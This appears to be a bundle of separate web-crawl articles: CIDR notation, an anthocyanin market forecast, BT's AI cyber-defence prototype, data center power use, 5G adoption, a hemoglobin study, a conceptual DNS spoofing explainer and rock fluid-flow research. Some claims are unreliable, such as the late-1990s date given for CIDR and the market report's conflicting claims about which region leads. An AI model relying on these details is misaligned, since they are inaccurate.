CIDR Stands for “Classless Inter-Domain Routing”. It replaced the original “classful” IPv4 address routing and allocation policies. CIDR is an IP Addressing scheme that improves the allocation of IP addresses.
Why is CIDR Important?
In the beginning, IPv4 blocks were designated in classes: A, B, and C. Class A had 16 million addresses, Class B had 65 thousand, and Class C had 256 addresses. This lack of granularity led to inefficient allocations and usage of increasingly scarce IPv4 addresses.
CIDR replaced classes with a nomenclature allowing for variable sized blocks, using an appellation called a subnet mask, designated as the number of masked bits behind a slash. Since the total number of bits in an IPv4 address is 32 bits, the size of the subnet mask can vary from a /0 (the whole internet) to a /32 (a single IPv4 address). This allowed for allocations and routing entries to describe any size of IPv4 block without the classful limit of only three sizes.
The original Class C, the smallest class containing just 256 addresses, is written as a /24 in CIDR notation. That means out of the total 32 bits of address space, 24 bits are masked, leaving only 8 bits of address space in the block. In binary terms, 8 bits equals 256 possible numbers. Likewise, a Class A network is now written as a /8, leaving 24 bits of address space in the block. Again, in binary terms 24 bits yields 16 million addresses.
Benefits of CIDR Notations
The benefits are clear when considering an entity with a need for 500 addresses. In the past, this would be larger than a Class C, and would require allocation of a Class B network containing 65,536 addresses. With CIDR, the allocation can be a /23, twice as large as a /24 and providing 512 addresses. So instead of wasting an entire Class B (a /16), less than 1% of the Class B is allocated, leaving the remainder available.
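Python's standard `ipaddress` module makes these sizes easy to check; for instance, the /23 from the example above versus a /24 and a /8:

```python
import ipaddress

for cidr in ("198.51.100.0/24", "198.51.100.0/23", "10.0.0.0/8"):
    net = ipaddress.ip_network(cidr)
    print(f"{cidr}: {net.num_addresses} addresses, netmask {net.netmask}")

# 198.51.100.0/24: 256 addresses, netmask 255.255.255.0
# 198.51.100.0/23: 512 addresses, netmask 255.255.254.0
# 10.0.0.0/8: 16777216 addresses, netmask 255.0.0.0
```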
CIDR’s introduction in the late 1990s was the largest reason for the extension of viable life for IPv4, which was anticipated to be exhausted in just a few years under the classful allocation regime. These days, the block sizes associated with particular subnet mask sizes are usually memorized by brokers with years of experience. | <urn:uuid:96fcccfb-5c24-41cb-9bb3-56f5b09b68b6> | CC-MAIN-2022-40 | https://iptrading.com/our-thoughts/what-is-cidr/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337595.1/warc/CC-MAIN-20221005073953-20221005103953-00319.warc.gz | en | 0.943297 | 699 | 3.765625 | 4 |
Anthocyanin is a water-soluble phytochemical with a characteristic red to blue color. It is a flavorless and odorless flavonoid commonly found in fruits and vegetables such as berries, cabbage, purple grapes and beets, among others. Anthocyanin also acts as an antioxidant and offers anti-allergic, anti-inflammatory, anti-microbial and microcirculation-improving properties. It is used extensively in the food and beverage industry as a colorant, and, apart from these functional properties, its wide range of health benefits makes it a preferred ingredient in many food products. Global demand for anthocyanin is driven by growing demand for color additives in the food and beverage industry, where it is applied as a food colorant. Increasing demand for healthy food products is expected to support demand for anthocyanin in the near future, and it is expected to become the preferred type of colorant over time because of its broad range of health benefits compared with other colorants.
The global anthocyanin market size is expected to reach nearly USD 747.34 million by 2026, expanding at a CAGR of more than 4.8% from 2019 to 2026.
The global market for anthocyanin has risen significantly over the past few years, owing to growing awareness of the health benefits of anthocyanin and its expanding range of applications across industries. Strengthening economic conditions in developing countries such as India, China, Brazil, and Argentina, and the resulting rise in consumer purchasing power, have helped increase the consumption of anthocyanin-rich foods in these countries.
Consumption of anthocyanin-rich products is also attributed to changing consumer lifestyles, driven in turn by rising awareness of health and wellness. According to a published study, regular intake of anthocyanin helps reduce the risk of heart disease and respiratory disorders and, like most other antioxidants, helps prevent cancer and fight oxidative damage, among other benefits. Many consumers look for food products that support a healthy lifestyle, and most products lack this health dimension. Including anthocyanin as a colorant raises the health profile of a product and gives it a larger consumer base.
Expanding application scope in pharmaceuticals and specialty drugs is expected to strengthen anthocyanin market growth over the forecast period. Superior properties such as microcirculation improvement and anti-microbial, anti-inflammatory and anti-allergic activity, combined with additional health benefits, are expected to drive market growth in this segment over the forecast period. Anthocyanin has been found effective against conditions such as cancer, diabetes, cognitive decline, and several cardiovascular diseases. Rapid urbanization and rising disposable income are other factors expected to drive anthocyanin market growth, particularly in emerging economies such as China, India, and Brazil, over the forecast period. Furthermore, changing consumption patterns combined with an increase in demand for healthy food are expected to fuel anthocyanin demand over the next seven years. Shifting consumer preferences toward healthy and attractive packaged food and beverage products are anticipated to propel growth in fruit extracts. However, several government regulations regarding anthocyanin use are expected to negatively affect market growth in the near future.
Among end uses, the food and beverage industry is likely to lead the market in 2018, and the trend is expected to remain unchanged over the course of the forecast period. The food and beverage segment contributed the largest share of revenue to the global market in 2018 and is projected to hold its dominance throughout the forecast period, as the range of applications of anthocyanin across food and beverage products is vast compared with applications in other key end-user industries.
Nevertheless, the therapeutic effects of anthocyanin, attributable to its antioxidative, neuroprotective, and anti-cancer nature, have made it suitable for pharmaceutical products as well. Demand for anthocyanin in the healthcare sector has risen sharply in the past few years, making the pharmaceutical industry one of the key contributors to the global anthocyanin market's growth. The pharmaceutical segment is therefore viewed as the most attractive application segment of the global anthocyanin market over the next few years and is expected to register the most promising CAGR of 4.6% from 2018 through 2026.
Europe is one of the key regional markets for anthocyanin in terms of revenue contribution to the global market, holding the highest revenue share, and is estimated to maintain its dominance throughout the forecast period. The U.K. leads the regional market. However, consumption of anthocyanin in the region has declined following the enforcement of stringent rules and regulations regarding the use of synthetic food colors in various products.
In Europe, each natural food color approved for use is assessed by the Scientific Committee on Food (SCF), which consists of a group of scientific experts from each member state appointed by the European Commission. This is expected to result in a slight decrease in the region's share of the global anthocyanin market by 2026, with Asia Pacific emerging as the next high-potential consumer between 2019 and 2026. The Asia Pacific anthocyanin market is expected to exhibit a highly promising and significant CAGR over that period.
North America currently leads the anthocyanin market, with the U.S. and Canada being the significant contributors to demand. In addition, several companies working in the field of anthocyanin have a strong presence in the region. Owing to the strong presence of the food and beverage, personal care, and pharmaceutical industries in the U.S., consumers have wide access to a variety of anthocyanin-infused products. Demand for anthocyanin in North America is expected to witness a significant surge during the forecast period.
Market Segmentation by Product:
Market Segmentation by End Use:
Market Segmentation by Source:
Market Segmentation by Region:
The market research study on "Anthocyanin Market (By Product: Cyanidin, Delphinidin, Malvidin, Pelargonidin, Peonidin, Petunidin; By End Use: Animal Feed, Cosmetics & Personal Care, Food & Beverage Industry, Nutraceutical Industry, Pharmaceutical Industry; By Source: Cereals, Flowers, Fruits, Legumes, Vegetables) - Global Industry Analysis, Market Size, Opportunities and Forecast, 2019 - 2026" offers detailed insights on global anthocyanin market segments with market dynamics and their impact. The report provides insights on the global anthocyanin market by product, end use, source, and major geographic regions.
Innovative product development satisfying customer needs is expected to be a key strategy adopted by these companies over the forecast period. Innovative advertising and marketing strategies are expected to increase market penetration in specialty segments over the next seven years. Social media platforms are expected to be used on a large scale to grow customer bases and market share. Partnerships, M&A, joint ventures, and expansion of existing facilities are other strategies expected to be adopted by major market participants to increase their share in the future.
Sensient Technologies Corporation has acquired the natural color business of a Peru-based natural food and ingredient comapnay—GlobeNatural—in the year 2018. This strategic acquisition was focused at product portfolio enhancement and improvement of manufacturing capabilities of the parent company
CHR Hansen Holding A/S has focused on growing its natural color business located in North America in the year 2018 by acquiring a manufacturing facility situated in Wisconsin. This expansion has enabled to serve the growing needs of customers through their distinguishable and exclusive offerings
Archer Daniels Midland Company (ADM) announced the proposed acquisition of an international manufacturer of animal nutrition products—Neovia—in 2018, in order to add to the company’s integrated animal nutrition portfolio
Major companies contributing to the global anthocyanin market are Archer Daniels Midland Co, CHR Hansen A/S, D.D. Williamson and Co. Inc., FMC Corporation, GNT Group, Kalsec Inc., Naturex S.A., Sensient Technologies Corp, Symrise A.G., and Synthite Industries
BT today announced that it has developed an epidemiology-based cybersecurity prototype, “Inflame”, which uses deep reinforcement learning to enable enterprises to automatically detect and respond to cyber-attacks before they compromise a network. Using the spread of viruses in human populations as a model to inform its AI, Inflame is a key component in BT’s recently-announced Eagle-i platform.
Epidemiological modelling is typically associated with the spread of viruses and diseases amongst human populations, and has been critical in analysing and managing the spread of COVID-19 over the past 20 months. Using the same principles of epidemiology, BT’s Inflame solution has been developed to understand how computer viruses and cyber-attacks spread across enterprise networks, and how to prevent them from happening.
To develop the technology, security researchers at the BT Labs in Suffolk, UK, built models of enterprise networks which were used to test numerous scenarios based on differing R rates of cyber-infection. This testing enabled the research team to understand how these threats can penetrate and compromise a network, and develop optimal automated responses needed to contain and prevent the spread of viruses across them.
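The details of BT's models are not public, but the basic idea of treating malware spread as an infection process with a tunable "R rate" can be sketched in a few lines of Python. The toy network, transmission probabilities, and one-step isolation assumption below are purely illustrative and are not taken from the Inflame research.

```python
# Minimal illustration (not BT's actual model): simulating how malware with a
# given per-contact transmission probability spreads across a small
# enterprise-style network, so different effective "R rates" can be compared.
import random

def simulate_spread(adjacency, patient_zero, p_transmit, steps, seed=0):
    """Discrete-time, SIR-style spread over a host adjacency map."""
    random.seed(seed)
    infected = {patient_zero}
    recovered = set()           # hosts assumed detected and isolated
    for _ in range(steps):
        newly_infected = set()
        for host in infected:
            for neighbour in adjacency[host]:
                if neighbour not in infected and neighbour not in recovered:
                    if random.random() < p_transmit:
                        newly_infected.add(neighbour)
        recovered |= infected   # assume one-step detection and isolation
        infected = newly_infected
        if not infected:
            break
    return len(recovered | infected)

# A toy network of six hosts; higher p_transmit behaves like a higher R number.
network = {
    "hr-pc": ["file-srv", "mail-srv"],
    "file-srv": ["hr-pc", "mail-srv", "dev-pc", "db-srv"],
    "mail-srv": ["hr-pc", "file-srv", "dev-pc"],
    "dev-pc": ["file-srv", "mail-srv", "db-srv"],
    "db-srv": ["file-srv", "dev-pc", "backup-srv"],
    "backup-srv": ["db-srv"],
}
for p in (0.1, 0.5, 0.9):
    print(p, simulate_spread(network, "hr-pc", p, steps=10))
```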
The deep reinforcement training and learning undertaken in the development of Inflame means the solution can automatically model and respond to a detected threat within an enterprise network. These responses are also underpinned by ‘attack lifecycle’ modelling, which assesses real-time security alerts against established patterns to understand the current stage of an ongoing cyber-attack. This insight is used to predict the next stages of an attack and rapidly identify the best response to prevent it from progressing any further.
BT recently announced its transformational cyber defence platform ‘Eagle-i', which uses AI to provide real-time detection of issues and intelligent automated responses. The platform has been designed to self-learn from the intelligence provided by each intervention, so that it constantly improves its threat knowledge and dynamically refines how it protects other users going forward.
“We know the risk of cyber-attack is higher than ever and has intensified significantly during the pandemic. Enterprises now need to look to new cybersecurity solutions that can understand the risk and consequence of an attack, and quickly respond before it’s too late,” said Howard Watson, Chief Technology Officer, BT. “Epidemiological testing has played a vital role in curbing the spread of infection during the pandemic, and Inflame uses the same principles to understand how current and future digital viruses spread through networks. Inflame will play a key role in how BT’s Eagle-i platform automatically predicts and identifies cyber-attacks before they impact, protecting customers’ operations and reputation.”
In epidemiology, the R number is used to quantify the spread of infectious diseases in a population
Mike Witts, Head of Technology Communications, BT | <urn:uuid:83acc845-206d-4ffd-bd8b-3c99983878f3> | CC-MAIN-2022-40 | https://www.darkreading.com/attacks-breaches/bt-to-deploy-epidemiological-ai-based-on-the-spread-of-viruses-in-humans-to-combat-cyberattacks | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00519.warc.gz | en | 0.941201 | 599 | 2.546875 | 3 |
The upward trend in the growth of data center energy usage has slowed, according to a new study from Stanford professor Jonathan Koomey. The report found that data center power consumption increased by 36 percent from 2005 to 2010, a much smaller increase than the 100 percent gain projected in an influential study Koomey prepared in 2007.
"The rapid rates of growth in data center electricity use that prevailed from 2000 to 2005 slowed significantly from 2005 to 2010, yielding total electricity use by data centers in 2010 of about 1.3% of all electricity use for the world, and 2% of all electricity use for the US," Koomey writes. The report, "Growth in Data Center Power Use 2005 to 2010,” was prepared for the New York Times, which summarizes the findings. The full report is available via Koomey's web site.
The moderating pace of data center energy use is "driven mainly by a lower server installed base than was earlier predicted rather than the efficiency improvements anticipated in the report to Congress," writes Koomey, whose 2007 report to Congress and the Environmental Protection Agency has framed most subsequent discussions of data center energy usage.
Economic Slowdown and Virtualization Cited
Koomey says companies have been buying fewer servers than anticipated due to the economic slowdown and the benefits of virtualization, which allows users to make better use of their server capacity. The study downplays the potential impact of an industry-wide effort to develop metrics and share best practices on energy efficiency, but indicated that these efforts could begin to have a larger impact in the near future, as more computing workloads shift to cloud computing platforms hosted in cutting-edge facilities.
In compiling the data, Koomey used estimates of installed servers from the research firm IDC. He assumed a data center Power Usage Effectiveness (PUE) rating of between 1.83 and 1.92, based on estimates of the average PUE reported in recent samplings by the EPA Energy Star Program and the Uptime Institute. While some cloud computing data centers have PUEs in the 1.1 to 1.3 range, Koomey noted that less efficient in-house corporate data centers account for the largest number of servers. "That (PUE) assumption will need to be revisited as cloud computing becomes more widely used," he wrote.
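PUE is defined as total facility energy divided by the energy consumed by the IT equipment alone, so the assumed PUE acts as a simple multiplier in any bottom-up energy estimate. The sketch below shows the arithmetic only; the server count and per-server power figure are made up for illustration and are not Koomey's inputs.

```python
# Illustrative only: how a PUE assumption scales an estimate of total data
# center electricity use. PUE = total facility energy / IT equipment energy,
# so facility energy = IT energy * PUE. The figures below are hypothetical.
def annual_facility_kwh(num_servers, avg_watts_per_server, pue):
    it_kwh = num_servers * avg_watts_per_server * 8760 / 1000.0  # kWh per year
    return it_kwh * pue

servers = 1_000_000                 # hypothetical installed base
for pue in (1.92, 1.83, 1.2):       # typical in-house vs. efficient cloud PUEs
    print(pue, round(annual_facility_kwh(servers, 250, pue) / 1e9, 2), "TWh/yr")
```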
Energy Usage Slows During Building Boom
The New York Times has been investigating data center energy use since early 2010, with a particular focus on Google’s data centers. “Data centers’ unquenchable thirst for electricity has been slaked by the global recession and by a combination of new power-saving technologies,” writes The Times’ John Markoff. “The decline in use is surprising because data centers, buildings that house racks and racks of computers, have become so central to modern life. The slowdown in the rate of growth of electricity use is particularly significant because it comes in the midst of the biggest build-out of new data center capacity in the history of the industry.”
The five-year period reviewed in the Koomey report tracks a time of dynamic growth for the data center industry, during which Google, Yahoo, Microsoft, Facebook and Apple all built enormous cloud data centers, while service providers filled space at wholesale data centers built by Digital Realty Trust and DuPont Fabros Technology.
5G can be significantly faster than 4G, delivering up to 20 Gigabits-per-second (Gbps) peak data rates and 100+ Megabits-per-second (Mbps) average data rates. 5G has more capacity than 4G. 5G is designed to support a 100x increase in traffic capacity and network efficiency. 5G has lower latency than 4G.
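To put those headline rates in perspective, a rough back-of-envelope comparison of download times is shown below. The 5G figures are the peak and average rates quoted above; the 4G average is a typical ballpark value assumed purely for illustration, not a measurement from this article.

```python
# Back-of-envelope comparison using the rates quoted above (20 Gbps peak,
# 100+ Mbps average for 5G); the 4G value is an assumed ballpark figure.
def download_seconds(file_gigabytes, rate_mbps):
    return file_gigabytes * 8 * 1000 / rate_mbps   # GB -> megabits -> seconds

file_gb = 2.0   # e.g. an HD movie
for label, mbps in [("4G average (~30 Mbps, assumed)", 30),
                    ("5G average (100 Mbps)", 100),
                    ("5G peak (20 Gbps)", 20_000)]:
    print(f"{label}: {download_seconds(file_gb, mbps):.1f} s")
```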
1G, 2G, 3G, and 4G all led to 5G, which is designed to provide more connectivity than was ever available before. 5G is a unified, more capable air interface. It has been designed with an extended capacity to enable next-generation user experiences, empower new deployment models, and deliver new services. With high speeds, superior reliability, and negligible latency, 5G will expand the mobile ecosystem into new realms. 5G will impact every industry, making safer transportation, remote healthcare, precision agriculture, digitized logistics — and more — a reality.
“5G is growing faster than anticipated and has reached subscription levels no previous generation has achieved”
ABI Research calculates the number of years a new generation takes until it reaches 100 million and 1 billion subscriptions, which can act as a metric to compare different generations along the same axis.
As can be seen from the figure, 5G is growing faster than previous generations: it reached 100 million subscriptions less than 2 years after the standard was published, whereas the closest generation, 4G, reached the same mark 5 years after its standard. Moreover, 5G is expected to reach 1 billion subscriptions in 2023, 5 years after it was standardized, while 4G reached the same target after 7 years.
Reasons for the Success of 5G in the Market
- Supply chain maturity: The cellular supply chain has reached high levels of efficiency with tight collaboration between chipset Original Equipment manufacturers (OEMs) and the handset and infrastructure manufacturers, as well as all component providers.
- Device availability: 5G devices were developed rapidly, and the first smartphones were ready less than 1 year before the 3GPP standard was published. Mid-tier smartphones followed a year after, making the 5G business case a success.
- Infrastructure vendor capabilities: Infrastructure vendors created high-performance, high-efficiency equipment on a large scale, also less than 1 year before the standard was published. mMIMO antennas that enable beamforming are an engineering leap ahead.
- Market demand: Long Term Evolution (LTE) and LTE-Advanced created the foundation for 5G and the market demand for high-quality mobile broadband. Today, 5G provides a significant capacity boost compared to previous generations.
All these reasons and numbers are encouraging; however, I have one concern to raise: 4G is likely to remain the dominant mobile technology for now, as 4G coverage is in excess of 80% in most countries and is forecast to reach over 90% by 2025.
However, the latest research evidence appears to point in the opposite direction: high hemoglobin levels are linked to metabolic morbidity and mortality, while low hemoglobin levels are an indication of better metabolic health.
Earlier this year, a research team led by Professor Peppi Karppinen from the University of Oulu, Finland, published a study which showed low hemoglobin levels to be associated with a lower body mass index and better metabolic health.
The study subjects were members of the OPERA cohort study (Oulu Project Elucidating Risk of Atherosclerosis). Nearly a thousand middle-aged individuals were included in the study, and their health was monitored until old age.
During 20 years of follow-up, higher hemoglobin levels were linked to common metabolic disorders, such as diabetes and hepatic steatosis, and also associated with higher cardiovascular morbidity and total mortality.
“In our previous study, we demonstrated that low hemoglobin levels induce a hypoxic response in the body. The activation of this response leads to changes in energy metabolism and the inflammatory response which provide individuals with lower hemoglobin level protection against metabolic disturbances.
The current results regarding the connection between higher hemoglobin levels and metabolic disorders and mortality are in line with our previous findings, supporting the idea that the body’s hypoxic response plays a key role in the regulation of energy metabolism in humans,” states principal investigator MD Joona Tapio.
Blood hemoglobin is one of the least expensive and most commonly tested laboratory parameters in the primary health care setting. According to Tapio, hemoglobin measurements could potentially be helpful in the early diagnosis of metabolic disorders.
The results could also help develop drug therapies for metabolic disorders. The hypoxic response is regulated by the HIF molecule which tries to ensure optimal oxygen uptake and energy metabolism in tissues under conditions of reduced oxygen availability.
According to the researchers, drugs that act as inhibitors of HIF enzymes, which regulate a hypoxic response, could potentially be used as anti-obesity and metabolism drugs in humans. These medicinal agents are currently being used in the treatment of anemia caused by kidney disease.
Metabolic syndrome is a cluster of concurrent disorders involving high blood glucose, adverse blood lipids and high blood pressure. Over the last few decades, this syndrome has become a global epidemic, and the conditions associated with it, such as diabetes, are major public health problems in Finland.
Over a billion people around the world have metabolic syndrome, and it has been estimated that about one out of four adult Finns suffers from it.
Metabolic syndrome (MetS) is a global epidemic which coincides with the increasing prevalence of obesity. MetS is defined as a group of metabolic disorders which increases the risk for type 2 diabetes (T2DM), cardiovascular diseases (CVD) and total mortality. The major components of MetS are visceral obesity, dyslipidemia and hypertension [1,2].
Non-alcoholic fatty liver disease (NAFLD) is also considered a co-morbidity of MetS [3]. The average prevalence of MetS was 31% in 2017 [4]. Individuals with MetS have a 46% increased risk of mortality compared to individuals without the syndrome [5].
Hb is the main carrier of oxygen in the cardiovascular system. Hb levels are regulated genetically and environmentally and they vary by sex, race, age and living altitude [6,7]. However, individual Hb levels during adult life are relatively stable, although Hb levels successively decrease with ageing in men and postmenopausal women [6].
In general, high-end Hb levels within the normal range are considered beneficial for health [6]. However, Hb levels can be elevated by factors such as smoking, a well-known risk factor for metabolic diseases, and higher Hb levels are also observed in obesity, which likewise is a well-known risk factor for cardiometabolic diseases [1,2].
Previous studies with selected cohorts, cross-sectional settings and often including only one sex have shown associations of higher Hb levels with individual components of MetS including insulin resistance, NAFLD, dyslipidemia and hypertension [8,9,10,11,12,13,14,15].
However, higher Hb levels have also been associated with lower glycated hemoglobin (HbA1c) levels [16]. Regarding obesity-related peptide hormones, Hb levels have previously been both positively and negatively associated with serum leptin levels and negatively associated with serum adiponectin levels [17,18,19].
Studies have also reported lower Hb levels (especially anemic) and very high Hb levels as predictors of total and CVD-related mortality [20,21,22,23]. The underlying mechanisms of the reported associations between higher Hb levels and metabolic markers have been poorly understood.
Hyperviscosity or changes in plasma volume [10,11,12,22,24], endothelial cell dysfunction [10] or higher iron/ferritin levels [13,15] have been suggested as mediators of these associations. However, we have recently shown that lower Hb levels associate with an overall healthier metabolic profile in males and females in two middle-aged Finnish sea-level birth cohorts studied in a longitudinal setting until the age of 46 years, and that these alterations are mediated by hypoxia [25]. All in all, the role of Hb levels as a risk factor for MetS and its comorbidities requires further study.
The aims of this study were
(1) to assess cross-sectionally the associations between Hb levels and some 20 key metabolic parameters, obesity-related peptides and ambulatory blood pressure (ABP) measurements in middle age (average age 51 years) and senescence (average age 72 years),
(2) to evaluate, in a cross-sectional design, Hb levels as a risk factor for fatty liver disease, and, in a longitudinal design, to evaluate the role of Hb levels
(3) in predicting the development of impaired glucose metabolism and
(4) as a risk factor for CVD events, CVD-related mortality and total mortality. Long-term studies considering the risk profile of these highly prevalent metabolic disorders are needed, and this study offers a follow-up period of ~20 years, to our knowledge the longest in the literature. Increased information about the risk profile of MetS would eventually lead to decreased morbidity and mortality through improved primary prevention.
Reference link: https://www.nature.com/articles/s41598-021-99217-9
More information: Joona Tapio et al, Higher hemoglobin levels are an independent risk factor for adverse metabolism and higher mortality in a 20-year follow-up, Scientific Reports (2021). DOI: 10.1038/s41598-021-99217-9 | <urn:uuid:6c8ec103-0e40-4b1b-89a3-6455bbd090a4> | CC-MAIN-2022-40 | https://debuglies.com/2021/11/07/a-finnish-study-showed-that-low-hemoglobin-levels-are-associated-with-a-lower-body-mass-index-and-better-metabolic-health/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00519.warc.gz | en | 0.946935 | 1,391 | 3.25 | 3 |
DNS spoofing is a type of cybersecurity attack in which a user is unknowingly directed to an attacker’s website disguised to look like a real one, with the intention of stealing the user’s credentials or diverting network traffic.
The Domain Name Server (DNS) locates nodes on the network and enables communication with them by resolving alphabetical domain names like www.example.com into their respective IP addresses. Spoofing attacks, meanwhile, are cyber attacks that can go undetected for long periods of time and can cause serious security issues for the victim system. These attacks trick victims into divulging personal information through email, text messages, caller ID, and even GPS receivers.
A DNS server is used for the purpose of resolving a domain name (such as abcd.com) into the associated IP address that is mapped to it. After the DNS server finds the appropriate IP address, data transfer is initiated between the client and website’s server. DNS spoofing is performed by replacing the IP addresses stored in the DNS server with the IP addresses controlled by the attacker. Once the process by the attacker is completed on the victim’s machine, whenever the victim tries to navigate to a specific website, they are redirected to the false website created by the attacker on the spoofed DNS server.
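The resolution step itself is easy to see from code: a stub resolver simply trusts whatever answer the configured DNS server returns. The short sketch below illustrates the idea of comparing a live answer against an expected record; the domain and "known-good" address are placeholders, and real tamper detection is considerably more involved.

```python
# A minimal look at what resolution does: the stub resolver hands back
# whatever IP the configured DNS server supplies. Comparing the answer with
# an out-of-band "expected" value is a crude way to notice tampering.
import socket

def resolve_ipv4(hostname):
    infos = socket.getaddrinfo(hostname, 80, socket.AF_INET)
    return sorted({info[4][0] for info in infos})

EXPECTED = {"example.com": ["93.184.216.34"]}   # placeholder known-good record

for host, known_good in EXPECTED.items():
    answer = resolve_ipv4(host)
    status = "matches expected record" if answer == known_good else "differs - investigate"
    print(host, answer, status)
```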
Methods of performing DNS spoofing attacks
DNS spoofing attacks are categorized on the basis of the attacker’s end goal. The term refers to a broad category of attacks that spoof DNS records. There are multiple ways to perform DNS spoofing, such as:
- Compromising a DNS server
- DNS cache poisoning attack
- Man-in-the-middle attack (if you can get access to the network)
- Sequence number guessing (maybe making many requests)
- False base station creation and fabricate the DNS server on network
Two famous methods of performing DNS spoofing are detailed as below
DNS Cache Poisoning – In DNS cache poisoning, the local DNS server is replaced with a compromised DNS server containing customized entries of genuine website names mapped to IP addresses chosen by the attacker. Thus, when the victim sends a request to the local DNS server for IP resolution, it communicates with the compromised DNS server, resulting in the user being redirected to a counterfeit website planted by the attacker. The attack is even simpler to carry out when many end users share the same DNS cache and the attacker manages to inject a forged DNS entry into that cache. For example, ISPs run caching DNS servers and route their customers through them. If an attacker gets past the security controls and updates the DNS server cache with an incorrect record, the attacker successfully spoofs DNS records for all the end users who rely upon that cache.
DNS ID Spoofing – In DNS ID spoofing, the victim sends a resolution request to the server, and the attacker duplicates the packet ID and IP information generated for that request in a forged response. Because the response ID matches the request ID, the victim’s machine accepts the response even though it contains information that was not expected.
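Why transaction-ID randomness matters can be shown with a tiny simulation: a resolver accepts the first reply whose ID matches its outstanding query, so an off-path attacker who floods forged replies succeeds far more often when the ID space is small (this is the weakness at the heart of the Kaminsky bug discussed below). This is a conceptual sketch only, not attack code, and the numbers are arbitrary.

```python
# Conceptual simulation: a resolver accepts the first reply whose transaction
# ID matches its query. If IDs come from a small pool, an off-path attacker
# who sends many forged replies with guessed IDs wins a query race often.
import random

def poisoning_success_rate(id_space, forged_replies_per_query, trials=10_000):
    wins = 0
    for _ in range(trials):
        query_id = random.randrange(id_space)
        guesses = {random.randrange(id_space) for _ in range(forged_replies_per_query)}
        if query_id in guesses:          # a forged reply matched before the real one
            wins += 1
    return wins / trials

print("weak 8-bit IDs :", poisoning_success_rate(2**8, 50))
print("full 16-bit IDs:", poisoning_success_rate(2**16, 50))
```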
Attacks of DNS spoofing
DNS spoofing has never been an ‘easy to detect’ cyber crime. On January 9, 2019, security vendor FireEye released its report, “Global DNS Hijacking Campaign: DNS Record Manipulation at Scale,” which went into far greater technical detail about the “how” of the espionage campaign, but contained few additional details about its victims. FireEye also reported that the U.S. Department of Homeland Security issued a rare emergency directive ordering all U.S. federal civilian agencies to secure the login credentials for their Internet domain records.
The Kaminsky attack against vulnerable servers also raised awareness of the seriousness of such issues. The issue, as described on the CVE page, is:
“The DNS protocol, as implemented in (1) BIND 8 and 9 before 9.5.0-P1, 9.4.2-P1, and 9.3.5-P1; (2) Microsoft DNS in Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2; and other implementations allow remote attackers to spoof DNS traffic via a birthday attack that uses in-bailiwick referrals to conduct cache poisoning against recursive resolvers, related to insufficient randomness of DNS transaction IDs and source ports, aka DNS Insufficient Socket Entropy Vulnerability or the Kaminsky bug.”
Preventive measures for DNS Spoofing
Multiple experts have focused on one persistent problem behind DNS-based attacks: a large number of organizations take much of their DNS infrastructure for granted. For example, many organizations do not keep records of their DNS traffic, nor maintain a history of any changes made to their domain records.
Common tips to prevent DNS spoofing include keeping DNS software up to date, maintaining separate servers for public and internal services, and using secure keys to sign updates received from other DNS servers in order to reject updates from non-trusted sources. A few preventive measures for organizations include:
- Use DNSSEC – DNSSEC, or Domain Name System Security Extensions, uses digitally signed DNS records to help determine data authenticity. DNSSEC is still a work in progress as far as deployment goes, however was implemented in the Internet root level in 2010. An example of a DNS service that fully supports DNSSEC is Google’s Public DNS.
- Using registration features like Registry Lock that help in protecting any unauthorized modifications being performed on domain names records.
- Implementation of access control mechanism for applications, Internet traffic and monitoring.
- Using 2-factor authentication.
- Implementation of unique password policy and Password managers.
- Using Certificate monitors via different mechanisms.
- Implement DNS spoofing detection mechanisms such as XArp.
- Use encrypted data transfer protocols – This type of encryption allows the users to verify whether the server’s digital certificate is valid and belongs to the website’s expected owner.
John Crain, chief security, stability and resiliency officer at ICANN, said:
“A lot of this comes down to data hygiene. Large organizations down to mom-and-pop entities are not paying attention to some very basic security practices, like multi-factor authentication. These days, if you have a sub-optimal security stance, you’re going to get owned. That’s the reality today. We’re seeing much more sophisticated adversaries now taking actions on the Internet, and if you’re not doing the basic stuff they’re going to hit you.” | <urn:uuid:b8ea33f2-4476-43d9-a360-0cca6c74658c> | CC-MAIN-2022-40 | https://www.lifars.com/2020/07/what-is-dns-spoofing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00519.warc.gz | en | 0.923422 | 1,377 | 3.359375 | 3 |
Engineers have dispelled a 100-year-old scientific law used to describe how fluids flow through rocks. The discovery leads to a range of improvements, including advances in Carbon Capture and Storage (CCS).
Miles below the surface of the Earth, different types of fluids flow through the microscopic spaces between the grains in rocks. Scientists from Imperial College London used the Diamond Light Source facility in the UK to make 3D videos that show how fluids move through rock.
Darcy’s Extended Law
Previously, scientists have used a formula for modelling how fluids move through rocks. It is called Darcy’s Extended Law, and its premise is that gases move through rock via their own separate, stable, complex, microscopic pathways. This approach has been used by engineers to model fluid flow for the last 100 years.
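For orientation, the textbook single-phase form of Darcy's law relates flux to permeability, viscosity and the pressure gradient, and the extended multiphase form scales the permeability by a relative permeability for each fluid. The snippet below is only this standard continuum description with illustrative numbers; the pore-scale imaging work described in the article goes well beyond it.

```python
# Textbook (single-phase) Darcy's law, for orientation only.
# q = -(k / mu) * dP/dx ; the "extended" multiphase form scales k by a
# relative permeability k_r for each fluid phase. Values are illustrative.
def darcy_flux(permeability_m2, viscosity_pa_s, dp_dx_pa_per_m, rel_perm=1.0):
    """Volumetric flux (m^3 per m^2 per s) through a porous medium."""
    return -(permeability_m2 * rel_perm / viscosity_pa_s) * dp_dx_pa_per_m

# Example: ~100 mD sandstone, water, 10 kPa/m pressure gradient.
k = 100 * 9.87e-16        # 1 millidarcy is roughly 9.87e-16 m^2
print(darcy_flux(k, 1.0e-3, -10_000.0, rel_perm=0.6))
```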
However, the Imperial scientists discovered that, rather than fluids flowing in a relatively stable pattern through rocks, the pathways that fluids flow through persist only for a short period of time, tens of seconds at most, before re-arranging and forming into different ones.
Researchers have called this process dynamic connectivity. The importance of the discovery is that researchers around the world are now able to more accurately model how fluids flow through rock.
Dr. Catriona Reynolds, lead author on the study, said that modelling fluid flow has proven a major scientific and engineering challenge: “Our new observations in this study will force engineers to re-evaluate their modelling techniques, increasing their accuracy.”
